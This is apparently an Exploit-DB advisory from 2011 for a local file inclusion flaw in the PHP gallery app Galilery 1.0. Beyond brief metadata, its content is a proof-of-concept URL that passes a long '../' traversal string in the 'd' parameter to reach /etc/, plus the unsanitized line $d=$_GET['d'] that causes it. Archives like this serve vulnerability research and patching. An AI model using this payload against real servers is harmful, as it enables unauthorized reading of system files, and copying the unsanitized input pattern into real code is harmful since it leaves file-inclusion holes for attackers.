Galilery 1.0 - Local File Inclusion

Author: lemlajt
type: webapps
platform: php
port: 
date_added: 2011-02-22 
date_updated: 2011-02-23 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comGalilery-1.0.tar.gz

$ cat 15_lfi_galilery.1.0.txt
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/


PoC :

http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/

cuz:
index.php: $d=$_GET['d'];

# *